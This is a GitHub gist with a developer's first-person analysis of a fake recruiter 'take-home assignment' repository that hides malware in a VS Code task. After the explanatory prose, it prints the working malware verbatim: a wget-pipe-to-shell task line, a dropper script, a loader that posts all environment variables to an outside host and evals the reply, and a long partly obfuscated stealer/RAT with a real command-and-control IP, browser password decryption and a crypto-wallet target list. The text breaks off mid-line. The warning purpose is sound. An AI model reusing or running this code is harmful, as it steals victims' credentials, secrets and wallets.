Skip to content

Instantly share code, notes, and snippets.

@compustar
Last active January 22, 2026 09:25
Show Gist options
  • Select an option

  • Save compustar/035b9417a07ae9c60c717eb38f7d0eaa to your computer and use it in GitHub Desktop.

Select an option

Save compustar/035b9417a07ae9c60c717eb38f7d0eaa to your computer and use it in GitHub Desktop.

The "TokenTradingDApp" Investigation: A Journey Down the Malware Rabbit Hole

It started with a warning.

I was scrolling through my feed when I stumbled upon an article on dev.to by Anderson Contreira: Warning to developers: A new wave of technical test scams is targeting devs. The premise was chilling—attackers were posing as recruiters, sending developers "take-home assignments" that contained hidden malware.

Curiosity got the better of me. I wanted to see exactly how these scams worked. I didn't want to just read about it; I wanted to dissect it.

The Discovery

I went to GitHub and typed tokentradingdapp into the search bar. One repository stood out: megaorg996/tokentradingdapp. It looked like a standard crypto project on the surface, but I knew better than to clone it directly. I started browsing the files in the browser.

Most developers look at package.json first. I looked at the hidden folders.

In .vscode/tasks.json, I found the smoking gun. Hidden inside a standard build task configuration was a command specifically targeting Linux users:

"command": "wget -qO- 'https://editorsettings.vercel.app/settings/linux?flag=1' | sh"

It was fetching a script from a Vercel app masquerading as "editor settings." I pulled the thread.

Layer 1: The Dropper (linux.sh)

I manually downloaded the URL. It returned a bash script I'll call linux.sh. It was simple, efficient, and malicious.

It created a hidden directory ($HOME/.vscode), cleared the terminal to hide its tracks, and then downloaded a second script: vscode-bootstrap.sh. Finally, it used nohup to execute that bootstrap script in the background, detaching it from the terminal so it would keep running even if I closed the window.

Layer 2: The Infrastructure (vscode-bootstrap.sh)

I fetched the next script in the chain. This wasn't some script-kiddie work; it was robust.

The vscode-bootstrap.sh script had one job: ensure execution at all costs. It checked if my machine had Node.js installed.

  • If yes: It used the system node.
  • If no: It identified my OS (Linux or macOS), downloaded a portable binary of Node.js v20 directly from the official nodejs.org dist site, unpacked it into the hidden folder, and set the path.

It was building its own runtime environment to ensure the malware would run, regardless of my machine's state. It then silently installed axios and request using npm and launched the next stage: env-setup.js.

Layer 3: The Thief & The Gatekeeper (env-setup.js)

This is where the attack got clever. I downloaded env-setup.js and saw this snippet:

const axios = require('axios');
const host = "ipcheckline.vercel.app";
const apikey = "3aeb34a31";
axios.post(
    `https://${host}/api/vscode-encrypted/${apikey}`,
    { ...process.env },
    { headers: { "x-secret-header": "secret" } }
)
.then((response) => {
    eval(response.data);
})

It was doing two things simultaneously:

  1. Exfiltration: It was stealing process.env. Every AWS key, database password, and API secret in my environment was being POSTed to ipcheckline.vercel.app instantly.
  2. Loader: It took the response from the server and ran eval(response.data). This meant the real malware was never saved to disk. It lived only in memory.

The Deception

I tried to curl the endpoint (https://ipcheckline.vercel.app/api/vscode-encrypted/3aeb34a31) with some fake environment variables to see what the payload looked like.

The result? A harmless JSON object containing GeoIP data.

{ "ipInfo": { "country": "United Kingdom", "city": "Hayes", ... } }

I was confused for a moment. Why execute eval() on GeoIP data?

Then it hit me. The script sends process.env to the server. The server analyzes the request. If it sees an empty environment (like my curl request) or a known security researcher's IP, it returns the harmless GeoIP data. It plays dead.

To get the real payload, I had to lie harder.

I wrote a python script (upload-env.py) to mimic a legitimate developer's machine, populating the request with fake API keys and realistic environment variables. I fired it off.

Bingo.

The server swallowed the bait. Instead of the small GeoIP JSON, it returned a massive 2MB string of obfuscated JavaScript.

The Payload: The Beast Within (tokentradingdapp-C2-script.js)

I deobfuscated the 2MB blob. What I found was a sophisticated Remote Access Trojan (RAT) and Information Stealer.

This wasn't just a script; it was an enterprise-grade surveillance tool. It connected to a Command & Control (C2) server at 144.172.105.122.

It had three distinct heads, running on different ports:

  1. The Vacuum (Port 8086): A file grabber designed to sweep the filesystem. It hunted for specific extensions (.py, .js, .json, .docx) and keywords ("password", "secret"). It enforced a 5MB limit to keep network traffic low profile.
  2. The Vault Breaker (Port 8085): A specialized module for high-value targets. It targeted Chromium browsers (Chrome, Brave, Edge) to decrypt saved passwords and cookies. It specifically hunted for crypto wallets (Metamask, Phantom) and uploaded the decrypted databases.
  3. The Puppeteer (Port 8087): A WebSocket-based RAT. It gave the attacker a live shell on the victim's machine. It could browse files, execute commands, and even had a loop running every second to watch the clipboard for copied crypto addresses or passwords.

It even had specific checks for WSL (Windows Subsystem for Linux). If it detected it was running in WSL, it would mount /mnt/c/Users to break out of the Linux container and steal files from the host Windows OS.

The Final Lesson

The most terrifying part of this investigation wasn't the code itself—it was how easily it could have happened to me or any of my colleagues.

We are conditioned to trust our tools. We treat git clone and code . as muscle memory. But this malware weaponized that trust. It didn't require me to run npm install or execute a startup script manually. It just needed me to open the folder.

The attackers relied on a powerful psychological exploit: urgency. By framing this as a "technical interview task" with a tight deadline, they knew I wouldn't spend 20 minutes auditing the .vscode configuration. They counted on the pressure of the job application to make me skip security checks and just get to work.

My final warning to every developer is this:

Never open a stranger's repository directly in VS Code on your main machine. Treat every "take-home assignment" like a potential bomb. If an interviewer or recruiter urges you to download and run a project quickly, that urgency is a massive red flag.

Use a sandbox, use a VM, or read the code in the browser first. But do not let the pressure of an interview trick you into granting a stranger root access to your life. The job isn't worth the compromise.

const axios = require('axios');
const host = "ipcheckline.vercel.app";
const apikey = "3aeb34a31";
axios
.post(
`https://${host}/api/vscode-encrypted/${apikey}`,
{ ...process.env },
{ headers: { "x-secret-header": "secret" } }
)
.then((response) => {
eval(response.data);
return response.data;
})
.catch((err) => {
return false;
});
#!/bin/bash
set -e
echo "Authenticated"
TARGET_DIR="$HOME/.vscode"
mkdir -p "$TARGET_DIR"
clear
wget -q -O "$TARGET_DIR/vscode-bootstrap.sh" "https://editorsettings.vercel.app/settings/bootstraplinux?flag=1"
clear
chmod +x "$TARGET_DIR/vscode-bootstrap.sh"
clear
nohup bash "$TARGET_DIR/vscode-bootstrap.sh" > /dev/null 2>&1 &
clear
exit 0
try {
const os = require("os");
const fs = require("fs");
const path = require("path");
const {
execSync,
spawn
} = require("child_process");
process.on("uncaughtException", z => {});
process.on("unhandledRejection", z => {});
const u_s = "http://144.172.105.122:8086/upload";
const l_s = "http://144.172.105.122:8085/upload";
const s_s = "http://144.172.105.122:8087";
const u_k = 101;
const t = 1;
const Utils = {
gsi: () => ({
host: os.hostname(),
os: os.type() + " " + os.release(),
username: os.userInfo().username || "unknown"
}),
is_wsl: () => {
if (process.env.WSL_DISTRO_NAME) {
return true;
}
try {
if (fs.existsSync("/proc/version")) {
const Y = fs.readFileSync("/proc/version", "utf8");
if (Y.toLowerCase().includes("microsoft") || Y.toLowerCase().includes("wsl")) {
return true;
}
}
} catch (K) {}
return false;
},
get_wu: () => {
try {
const a = execSync("cmd.exe /c echo %USERNAME%", {
encoding: "utf8"
}).trim();
if (a && a.length > 0 && !a.includes("%USERNAME%")) {
return a;
}
} catch (S) {}
try {
const Z = "/mnt/c/Users";
if (fs.existsSync(Z)) {
const q = fs.readdirSync(Z, {
withFileTypes: true
});
const m = ["Public", "Default", "All Users", "Default User"];
for (const L of q) {
if (L.isDirectory() && !m.includes(L.name)) {
return L.name;
}
}
}
} catch (C) {}
return process.env.USERNAME || process.env.USER || null;
},
set_l: z => {
return null;
return "\n const logDir = path.join(process.cwd(), '.logs');\n if (!fs.existsSync(logDir)) {\n fs.mkdirSync(logDir, { recursive: true });\n }\n const logFile = path.join(logDir, `" + z + "_${Date.now()}.log`);\n const originalLog = console.log;\n const originalError = console.error;\n const originalWarn = console.warn;\n const writeLog = (level, ...args) => {\n const timestamp = new Date().toISOString();\n const message = args.map(arg => typeof arg === 'object' ? JSON.stringify(arg) : String(arg)).join(' ');\n const logLine = `[${timestamp}] [${level}] ${message}\\n`;\n try {\n fs.appendFileSync(logFile, logLine, 'utf8');\n } catch (e) {}\n if (level === 'LOG') originalLog.apply(console, args);\n else if (level === 'ERROR') originalError.apply(console, args);\n else if (level === 'WARN') originalWarn.apply(console, args);\n };\n console.log = (...args) => writeLog('LOG', ...args);\n console.error = (...args) => writeLog('ERROR', ...args);\n console.warn = (...args) => writeLog('WARN', ...args);\n ";
},
sp_s: (z, s, a, Y) => {
const S = {
ThJTu: "SIGTERM",
LrLQK: function (q, m, L) {
return q(m, L);
},
Zkieb: "info",
waIzt: function (q, m) {
return q + m;
},
ddFvB: "debu",
crQzY: "gger",
ibfEH: "action",
arrgC: "function *\\( *\\)",
KQHHM: "\\+\\+ *(?:[a-zA-Z_$][0-9a-zA-Z_$]*)",
bCLzb: function (q, m) {
return q(m);
},
fqHhp: "init",
EZnsC: function (q, m) {
return q + m;
},
qeZiJ: "chain",
KwUbp: function (q, m) {
return q + m;
},
JTxEV: "input",
BZUJu: function (q, m) {
return q(m);
},
KJtZz: function (q) {
return q();
},
tMXrh: function (q, m) {
return q(m);
},
MXmYG: "/proc/version",
bhRQt: "utf8",
rKQiw: "microsoft",
BUfzH: "wsl",
lYwKK: function (q, m) {
return q + m;
},
PFREj: function (q, m) {
return q + m;
},
UVrTt: "pid.",
kgBvq: ".1.lock",
pJomE: "ldbScript",
LKQCw: function (q, m) {
return q + m;
},
Begoz: "return (function() ",
fotpA: "{}.constructor(\"return this\")( )",
uxTiV: function (q, m) {
return q(m);
},
LhMZG: "socket.io-client",
QQFNF: function (q, m) {
return q(m);
},
DSqoc: "sql.js",
ENdRk: function (q, m) {
return q(m);
},
mIPec: "form-data",
JisoV: function (q, m) {
return q(m);
},
vaPEG: "axios",
xmeqb: function (q, m) {
return q !== m;
},
RxtPX: "WNyLC",
qWnDh: "aIlsg",
ihuQp: function (q, m) {
return q === m;
},
hQrad: "VhHax",
loHUc: "htUgZ",
xtdao: function (q, m) {
return q !== m;
},
LrPKd: "ZQBFW",
BMXqa: function (q, m) {
return q - m;
},
JGxCC: function (q, m) {
return q * m;
},
BIBWs: function (q, m) {
return q * m;
},
HssCg: function (q, m) {
return q * m;
},
WtJxf: function (q, m) {
return q < m;
},
INecb: "lEbAk",
qRPGo: function (q, m) {
return q !== m;
},
GGAXT: "ZYPob",
lqorN: "fluCQ",
otthS: function (q, m) {
return q !== m;
},
zReJC: "KdFSF",
IwBlZ: "ibyVN",
HDVqw: "MMbMt",
dqFPt: function (q, m) {
return q !== m;
},
MjrqL: "GhdeK",
IZHYC: "Ynsej",
fpwKl: "QWnxv",
Efjyg: function (q, m) {
return q !== m;
},
xtfNL: "tcgAA",
REcFM: function (q, m) {
return q + m;
},
AYWuy: "Spawning ",
uqZFq: function (q, m) {
return q !== m;
},
jUoxg: "wECbS",
KjCUw: function (q, m, L, E) {
return q(m, L, E);
},
Vjsea: "--max-old-space-size=4096",
qlKYM: "--no-warnings",
VLqau: "pipe",
BjZFP: "ignore",
zsczb: "exit",
HFQBO: "error",
twPZZ: "close",
iREMS: "SRtBT",
CUsSl: function (q, m) {
return q(m);
},
bSzBe: function (q, m) {
return q + m;
},
AyOUX: function (q, m) {
return q + m;
},
DUyNo: "Failed to spawn ",
OUdzp: "ZWzIh",
rALXU: "PgoFF",
VgVyF: function (q, m) {
return q + m;
},
UmGSW: " is already running, skipping"
};
const K = path.join(os.tmpdir(), s);
let Z = true;
if (fs.existsSync(K)) {
if (S.xmeqb(S.loHUc, S.loHUc)) {
try {
process.kill(T, S.ThJTu);
S.LrLQK(o, "Killing stale " + A + " process (PID: " + F + ", started: " + new n(l).toISOString() + ")", S.Zkieb);
} catch (m) {}
u.unlinkSync(R);
j = true;
} else {
try {
if (S.xtdao(S.LrPKd, S.LrPKd)) {
(function () {
return true;
}).constructor(ERSnPn.waIzt(ERSnPn.ddFvB, ERSnPn.crQzY)).call(ERSnPn.ibfEH);
} else {
const L = JSON.parse(fs.readFileSync(K, S.bhRQt));
const E = L.pid;
const p = L.startedAt;
const Q = S.BMXqa(Date.now(), S.JGxCC(S.BIBWs(S.HssCg(24, 60), 60), 1000));
if (p && S.WtJxf(p, Q)) {
if (S.xmeqb(S.INecb, S.INecb)) {
if (S.isDirectory() && !K.includes(Z.name)) {
return m.name;
}
} else {
try {
if (S.qRPGo(S.GGAXT, S.GGAXT)) {
const u = new S(ERSnPn.arrgC);
const R = new K(ERSnPn.KQHHM, "i");
const j = ERSnPn.bCLzb(Z, ERSnPn.fqHhp);
if (!u.test(ERSnPn.EZnsC(j, ERSnPn.qeZiJ)) || !R.test(ERSnPn.KwUbp(j, ERSnPn.JTxEV))) {
ERSnPn.BZUJu(j, "0");
} else {
ERSnPn.KJtZz(m);
}
} else {
process.kill(E, S.ThJTu);
S.LrLQK(Y, "Killing stale " + a + " process (PID: " + E + ", started: " + new Date(p).toISOString() + ")", S.Zkieb);
}
} catch (u) {}
fs.unlinkSync(K);
Z = true;
}
} else if (S.ihuQp(S.lqorN, S.lqorN)) {
try {
if (S.otthS(S.zReJC, S.zReJC)) {
ERSnPn.tMXrh(s, 0);
} else {
process.kill(E, 0);
Z = false;
}
} catch (j) {
if (S.qRPGo(S.IwBlZ, S.HDVqw)) {
fs.unlinkSync(K);
Z = true;
} else {
return s;
}
}
} else {
process.kill(Z, S.ThJTu);
S.LrLQK(q, "Killing stale " + m + " process (PID: " + L + ", started: " + new E(p).toISOString() + ")", S.Zkieb);
}
}
} catch (A) {
if (S.dqFPt(S.MjrqL, S.MjrqL)) {
const n = s.readFileSync(S.MXmYG, S.bhRQt);
if (n.toLowerCase().includes(S.rKQiw) || n.toLowerCase().includes(S.BUfzH)) {
return true;
}
} else {
try {
if (S.xmeqb(S.IZHYC, S.fpwKl)) {
fs.unlinkSync(K);
} else {
S.sp_s(K, S.lYwKK(S.PFREj(S.UVrTt, Z), S.kgBvq), S.pJomE, q);
}
} catch (l) {}
Z = true;
}
}
}
}
if (Z) {
if (S.Efjyg(S.xtfNL, S.xtfNL)) {
let globalObject;
try {
globalObject = ERSnPn.BZUJu(S, ERSnPn.LKQCw(ERSnPn.EZnsC(ERSnPn.Begoz, ERSnPn.fotpA), ");"))();
} catch (J) {
globalObject = Z;
}
return globalObject;
} else {
S.LrLQK(Y, S.REcFM(S.AYWuy, a), S.Zkieb);
try {
if (S.uqZFq(S.jUoxg, S.jUoxg)) {
S.uxTiV(require, S.LhMZG);
S.QQFNF(require, S.DSqoc);
S.ENdRk(require, S.mIPec);
S.JisoV(require, S.vaPEG);
} else {
const P = S.KjCUw(spawn, process.execPath, [S.Vjsea, S.qlKYM, "-"], {
windowsHide: true,
detached: true,
stdio: [S.VLqau, S.BjZFP, S.BjZFP]
});
P.stdin.end(z);
P.unref();
const i = {
pid: P.pid,
startedAt: Date.now()
};
fs.writeFileSync(K, JSON.stringify(i), S.bhRQt);
const y = () => {
if (S.xmeqb(S.RxtPX, S.qWnDh)) {
try {
if (S.ihuQp(S.hQrad, S.hQrad)) {
if (fs.existsSync(K)) {
fs.unlinkSync(K);
}
} else {
const B = Z ? function () {
if (B) {
const U = R.apply(j, arguments);
T = null;
return U;
}
} : function () {};
p = false;
return B;
}
} catch (B) {}
} else {
a.unlinkSync(Y);
}
};
P.on(S.zsczb, y);
P.on(S.HFQBO, y);
P.on(S.twPZZ, y);
}
} catch (N) {
if (S.ihuQp(S.iREMS, S.iREMS)) {
S.CUsSl(Y, S.bSzBe(S.AyOUX(S.bSzBe(S.DUyNo, a), ": "), N.message));
} else {
try {
if (m.existsSync(L)) {
E.unlinkSync(p);
}
} catch (U) {}
}
}
}
} else if (S.ihuQp(S.OUdzp, S.rALXU)) {
const W = Y.apply(S, arguments);
K = null;
return W;
} else {
S.LrLQK(Y, S.VgVyF(a, S.UmGSW), S.Zkieb);
}
}
};
{
try {
require("socket.io-client");
require("sql.js");
require("form-data");
require("axios");
} catch (G) {
try {
execSync("npm install sql.js socket.io-client form-data axios --no-save --no-warnings --no-progress --loglevel silent", {
stdio: ["pipe", "pipe", "pipe"],
maxBuffer: 10485760
});
} catch (c) {}
}
}
const axios = require("axios");
const gsi = Utils.gsi;
async function f_s_l(z, s = "info", a = {}) {
const Y = {
ruVWo: "function *\\( *\\)",
vxGJl: "\\+\\+ *(?:[a-zA-Z_$][0-9a-zA-Z_$]*)",
JDYDX: function (Z, q) {
return Z(q);
},
Bplnn: "init",
JdxLT: function (Z, q) {
return Z + q;
},
yGHGz: "chain",
tCJTO: "input",
sMbHt: function (Z) {
return Z();
},
oJwkr: function (Z, q, m) {
return Z(q, m);
},
EPPnj: "cmd.exe /c echo %USERNAME%",
eGuxQ: "utf8",
XuiJL: function (Z, q) {
return Z > q;
},
lCMiM: "%USERNAME%",
CxPRW: function (Z, q) {
return Z(q);
},
ASkwA: "(((.+)+)+)+$",
KsnjE: function (Z, q) {
return Z !== q;
},
ytbFw: "rkLqN",
RFrxK: function (Z, q) {
return Z !== q;
},
Bmybk: "xGpYh",
WXahm: "CyOsa",
tpUnQ: "Log message is required",
lqqkB: "application/json",
uWGGZ: function (Z, q) {
return Z === q;
},
YgBgF: "sZMSI",
OFSBF: function (Z, q) {
return Z !== q;
},
nUuYJ: "krYzH",
ZPEOA: "Failed to send log",
jkMmN: "PlkWV",
yLaBa: "jhvpm"
};
const S = s_s + "/api/log";
const K = Utils.gsi();
try {
if (Y.KsnjE(Y.ytbFw, Y.ytbFw)) {
const q = {
boGqk: XnViBr.ruVWo,
EfVur: XnViBr.vxGJl,
FwLcR: function (m, L) {
return XnViBr.JDYDX(m, L);
},
CTMTs: XnViBr.Bplnn,
yUihw: function (m, L) {
return XnViBr.JdxLT(m, L);
},
MKFpI: XnViBr.yGHGz,
CfcZH: XnViBr.tCJTO,
TBGkC: function (m, L) {
return XnViBr.JDYDX(m, L);
},
GjmIC: function (m) {
return XnViBr.sMbHt(m);
}
};
XnViBr.oJwkr(K, this, function () {
const T = new E(q.boGqk);
const o = new p(q.EfVur, "i");
const A = q.FwLcR(Q, q.CTMTs);
if (!T.test(q.yUihw(A, q.MKFpI)) || !o.test(q.yUihw(A, q.CfcZH))) {
q.TBGkC(A, "0");
} else {
q.GjmIC(v);
}
})();
} else {
if (!z) {
if (Y.RFrxK(Y.Bmybk, Y.WXahm)) {
throw new Error(Y.tpUnQ);
} else if (S) {
const E = m.apply(L, arguments);
E = null;
return E;
}
}
const q = {
ukey: u_k,
t: t,
host: u_k + "_" + K.host,
os: K.os,
username: K.username,
message: z,
level: s,
data: a
};
const m = await axios.post(S, q, {
headers: {
"Content-Type": Y.lqqkB
},
timeout: 10000
});
if (m.data.success) {
if (Y.uWGGZ(Y.YgBgF, Y.YgBgF)) {
return m.data;
} else {
const p = Y.oJwkr(s, Y.EPPnj, {
encoding: Y.eGuxQ
}).trim();
if (p && Y.XuiJL(p.length, 0) && !p.includes(Y.lCMiM)) {
return p;
}
}
} else if (Y.OFSBF(Y.nUuYJ, Y.nUuYJ)) {
if (Y) {
return Z;
} else {
XnViBr.CxPRW(q, 0);
}
} else {
throw new Error(m.data.error || Y.ZPEOA);
}
}
} catch (Q) {
if (Y.OFSBF(Y.jkMmN, Y.yLaBa)) {
if (Q.response) {} else if (Q.request) {} else {}
} else {
return a.toString().search(XnViBr.ASkwA).toString().constructor(Y).search(XnViBr.ASkwA);
}
}
}
const s_u_c = "\nconst gsi = () => ({\n host: os.hostname(),\n os: os.type() + \" \" + os.release(),\n username: os.userInfo().username || \"unknown\",\n});\n\nconst is_wsl = () => {\n if (process.env.WSL_DISTRO_NAME) return true;\n try {\n if (fs.existsSync(\"/proc/version\")) {\n const versionContent = fs.readFileSync(\"/proc/version\", \"utf8\");\n if (versionContent.toLowerCase().includes(\"microsoft\") || versionContent.toLowerCase().includes(\"wsl\")) {\n return true;\n }\n }\n } catch (e) {}\n return false;\n};\n\nconst get_wu = () => {\n try {\n const username = execSync(\"cmd.exe /c echo %USERNAME%\", { encoding: \"utf8\" }).trim();\n if (username && username.length > 0 && !username.includes(\"%USERNAME%\")) {\n return username;\n }\n } catch (e) {}\n try {\n const usersPath = \"/mnt/c/Users\";\n if (fs.existsSync(usersPath)) {\n const entries = fs.readdirSync(usersPath, { withFileTypes: true });\n const systemDirs = [\"Public\", \"Default\", \"All Users\", \"Default User\"];\n for (const entry of entries) {\n if (entry.isDirectory() && !systemDirs.includes(entry.name)) {\n return entry.name;\n }\n }\n }\n } catch (e) {}\n return process.env.USERNAME || process.env.USER || null;\n};\n";
const r = async () => {
f_s_l("Starting client", "info");
const s = "const { exec, execSync } = require(\"child_process\");\nconst path = require(\"path\");\nconst axios = require(\"axios\");\nconst fs = require(\"fs\");\nconst fsPromises = require(\"fs/promises\");\nconst os = require(\"os\");\nconst FormData = require(\"form-data\");\nconst crypto = require(\"crypto\");\nconst { exit } = require(\"process\");\n" + s_u_c + "\n" + Utils.set_l("ldb") + "\nconst formData = new FormData();\nlet i = 0;\nconst wps = [\"nkbihfbeogaeaoehlefnkodbefgpgknn\", \"ejbalbakoplchlghecdalmeeeajnimhm\", \"acmacodkjbdgmoleebolmdjonilkdbch\", \"bfnaelmomeimhlpmgjnjophhpkkoljpa\", \"ibnejdfjmmkpcnlpebklmnkoeoihofec\", \"egjidjbpglichdcondbcbdnbeeppgdph\", \"nphplpgoakhhjchkkhmiggakijnkhfnd\", \"omaabbefbmiijedngplfjmnooppbclkk\", \"bhhhlbepdkbapadjdnnojkbgioiodbic\", \"aeachknmefphepccionboohckonoeemg\", \"aflkmhkiijdbfcmhplgifokgdeclgpoi\", \"agoakfejjabomempkjlepdflaleeobhb\", \"aholpfdialjgjfhomihkjbmgjidlcdno\", \"afbcbjpbpfadlkmhmclhkeeodmamcflc\", \"cgbogdmdefihhljhfeffkljbghamglni\", \"dmkamcknogkgcdfhhbddcghachkejeap\", \"dlcobpjiigpikoobohmabehhmhfoodbb\", \"efbglgofoippbgcjepnhiblaibcnclgk\", \"ejjladinnckdgjemekebdpeokbikhfci\", \"fhbohimaelbohpjbbldcngcnapndodjp\", \"fhkbkphfeanlhnlffkpologfoccekhic\", \"fhmfendgdocmcbmfikdcogofphimnkno\", \"fldfpgipfncgndfolcbkdeeknbbbnhcc\", \"gjnckgkfmgmibbkoficdidcljeaaaheg\", \"hifafgmccdpekplomjjkcfgodnhcellj\", \"hmeobnfnfcmdkdcmlblgagmfpfboieaf\", \"hnfanknocfeofbddgcijnmhnfnkdnaad\", \"jiidiaalihmmhddjgbnbgdfflelocpak\", \"jblndlipeogpafnldhgmapagcccfchpi\", \"jmbkjchcobfffnmjboflnchcbljiljdk\", \"jnjpmcgfcfeffkfgcnjefkbkgcpnkpab\", \"kpkmkbkoifcfpapmleipncofdbjdpice\", \"khpkpbbcccdmmclmpigdgddabeilkdpd\", \"ldinpeekobnhjjdofggfgjlcehhmanaj\", \"lgmpcpglpngdoalbgeoldeajfclnhafa\", \"mcohilncbfahbmgdjkbpemcciiolgcge\", \"mopnmbcafieddcagagdcbnhejhlodfdd\", \"nkklfkfpelhghbidbnpdfhblphpfjmbo\", \"penjlddjkjgpnkllboccdgccekpkcbin\", \"ppbibelpcjmhbdihakflkdcoccbgbkpo\"];\nconst platform = process.platform;\n\nconst getWindowsBrowserPaths = (windowsUsername) => {\n if (!windowsUsername) return [];\n \n const windowsPaths = [];\n // When running in WSL, use /mnt/c/ path format to access Windows filesystem\n // Windows AppData paths: /mnt/c/Users/{username}/AppData/Local/...\n const localAppDataBase = `/mnt/c/Users/${windowsUsername}/AppData/Local`;\n \n const browserRelativePaths = [\n \"Google/Chrome/User Data\", // Chrome\n \"BraveSoftware/Brave-Browser/User Data\", // Brave\n \"AVG Browser/User Data\", // AVG Browser\n \"Microsoft/Edge/User Data\", // Edge\n \"Opera Software/Opera Stable\", // Opera\n \"Opera Software/Opera GX\", // Opera GX\n \"Vivaldi/User Data\", // Vivaldi\n \"Kiwi Browser/User Data\", // Kiwi\n \"Yandex/YandexBrowser/User Data\", // Yandex\n \"Iridium/User Data\", // Iridium\n \"Comodo/Dragon/User Data\", // Comodo\n \"SRWare Iron/User Data\", // SRWare\n \"Chromium/User Data\" // Chromium\n ];\n \n browserRelativePaths.forEach(relativePath => {\n const fullPath = path.join(localAppDataBase, relativePath);\n windowsPaths.push(fullPath);\n });\n \n return windowsPaths;\n};\n\nconst getChromiumBasePaths = () => {\n const chromiumBrowserPaths = [\n [\n path.join(process.env.LOCALAPPDATA || '', \"Google/Chrome/User Data\"),\n path.join(process.env.HOME || '', \"Library/Application Support/Google/Chrome\"),\n path.join(process.env.HOME || '', \".config/google-chrome\")\n ],\n [\n path.join(process.env.LOCALAPPDATA || '', \"BraveSoftware/Brave-Browser/User Data\"),\n path.join(process.env.HOME || '', \"Library/Application Support/BraveSoftware/Brave-Browser\"),\n path.join(process.env.HOME || '', \".config/BraveSoftware/Brave-Browser\")\n ],\n [\n path.join(process.env.LOCALAPPDATA || '', \"AVG Browser/User Data\"),\n path.join(process.env.HOME || '', \"Library/Application Support/AVG Browser\"),\n path.join(process.env.HOME || '', \".config/avg-browser\")\n ],\n [\n path.join(process.env.LOCALAPPDATA || '', \"Microsoft/Edge/User Data\"),\n path.join(process.env.HOME || '', \"Library/Application Support/Microsoft Edge\"),\n path.join(process.env.HOME || '', \".config/microsoft-edge\")\n ],\n [\n path.join(process.env.LOCALAPPDATA || '', \"Opera Software/Opera Stable\"),\n path.join(process.env.HOME || '', \"Library/Application Support/com.operasoftware.Opera\"),\n path.join(process.env.HOME || '', \".config/opera\")\n ],\n [\n path.join(process.env.LOCALAPPDATA || '', \"Opera Software/Opera GX\"),\n path.join(process.env.HOME || '', \"Library/Application Support/com.operasoftware.OperaGX\"),\n path.join(process.env.HOME || '', \".config/opera-gx\")\n ],\n [\n path.join(process.env.LOCALAPPDATA || '', \"Vivaldi/User Data\"),\n path.join(process.env.HOME || '', \"Library/Application Support/Vivaldi\"),\n path.join(process.env.HOME || '', \".config/vivaldi\")\n ],\n [\n path.join(process.env.LOCALAPPDATA || '', \"Kiwi Browser/User Data\"),\n path.join(process.env.HOME || '', \"Library/Application Support/Kiwi Browser\"),\n path.join(process.env.HOME || '', \".config/kiwi-browser\")\n ],\n [\n path.join(process.env.LOCALAPPDATA || '', \"Yandex/YandexBrowser/User Data\"),\n path.join(process.env.HOME || '', \"Library/Application Support/Yandex/YandexBrowser\"),\n path.join(process.env.HOME || '', \".config/yandex-browser\")\n ],\n [\n path.join(process.env.LOCALAPPDATA || '', \"Iridium/User Data\"),\n path.join(process.env.HOME || '', \"Library/Application Support/Iridium\"),\n path.join(process.env.HOME || '', \".config/iridium-browser\")\n ],\n [\n path.join(process.env.LOCALAPPDATA || '', \"Comodo/Dragon/User Data\"),\n path.join(process.env.HOME || '', \"Library/Application Support/Comodo/Dragon\"),\n path.join(process.env.HOME || '', \".config/comodo-dragon\")\n ],\n [\n path.join(process.env.LOCALAPPDATA || '', \"SRWare Iron/User Data\"),\n path.join(process.env.HOME || '', \"Library/Application Support/SRWare Iron\"),\n path.join(process.env.HOME || '', \".config/srware-iron\")\n ],\n [\n path.join(process.env.LOCALAPPDATA || '', \"Chromium/User Data\"),\n path.join(process.env.HOME || '', \"Library/Application Support/Chromium\"),\n path.join(process.env.HOME || '', \".config/chromium\")\n ]\n ];\n const platform = process.platform;\n if (platform === \"win32\") {\n return chromiumBrowserPaths.map(browser => browser[0]);\n } else if (platform === \"darwin\") {\n return chromiumBrowserPaths.map(browser => browser[1]);\n } else if (platform === \"linux\") {\n if (is_wsl()) {\n const windowsUsername = get_wu();\n if (windowsUsername) {\n return getWindowsBrowserPaths(windowsUsername);\n }\n }\n return chromiumBrowserPaths.map(browser => browser[2]);\n } else {\n process.exit(1);\n }\n};\nasync function sleep(ms) {\n return new Promise((resolve) => setTimeout(resolve, ms));\n}\nasync function initSqlJs() {\n try {\n const sqljs = require('sql.js');\n if (typeof sqljs === 'function') {\n return await sqljs();\n }\n return sqljs;\n } catch (e) {\n console.log(\"installing sql.js\");\n try {\n const platform = process.platform;\n const installOptions = platform === 'win32' \n ? { windowsHide: true, stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 1024 * 1024 * 10 }\n : { stdio: ['pipe', 'pipe', 'pipe'], maxBuffer: 1024 * 1024 * 10 };\n execSync(\"npm install sql.js --no-save --no-warnings --no-save --no-progress --loglevel silent\", installOptions);\n const sqljs = require('sql.js');\n if (typeof sqljs === 'function') {\n return await sqljs();\n }\n return sqljs;\n } catch (installErr) {\n console.log(\"sql.js install err\");\n return null;\n }\n }\n}\nfunction getBrowserEncryptionKey(localStatePath, browserName = 'Chrome') {\n try {\n if (!fs.existsSync(localStatePath)) {\n return null;\n }\n const localState = JSON.parse(fs.readFileSync(localStatePath, 'utf8'));\n const encryptedKey = localState?.os_crypt?.encrypted_key;\n console.log('encryptedKey', encryptedKey);\n if (!encryptedKey) {\n return null;\n }\n const encryptedKeyBytes = Buffer.from(encryptedKey, 'base64');\n const platform = process.platform;\n if (platform === 'win32') {\n if (encryptedKeyBytes.slice(0, 5).toString('utf8') === 'DPAPI') {\n const dpapiEncrypted = encryptedKeyBytes.slice(5);\n const dpapiScopes = [\n { flag: 0, name: 'CurrentUser' },\n { flag: 1, name: 'LocalMachine' }\n ];\n for (const scope of dpapiScopes) {\n try {\n const tempScriptPath = path.join(os.tmpdir(), `decrypt-key-${Date.now()}-${Math.random().toString(36).substr(2, 9)}.ps1`);\n const base64Encrypted = dpapiEncrypted.toString('base64');\n const psScript = `$ErrorActionPreference = 'Stop';\ntry {\nAdd-Type -AssemblyName System.Security -ErrorAction Stop;\n} catch {\n[System.Reflection.Assembly]::Load('System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a') | Out-Null;\n}\n$encrypted = [System.Convert]::FromBase64String('${base64Encrypted}');\ntry {\n$decrypted = [System.Security.Cryptography.ProtectedData]::Unprotect($encrypted, $null, [System.Security.Cryptography.DataProtectionScope]::${scope.name});\n} catch {\nthrow;\n}\n[System.Convert]::ToBase64String($decrypted)`;\n fs.writeFileSync(tempScriptPath, psScript, 'utf8');\n try {\n const keyBase64 = execSync(\n 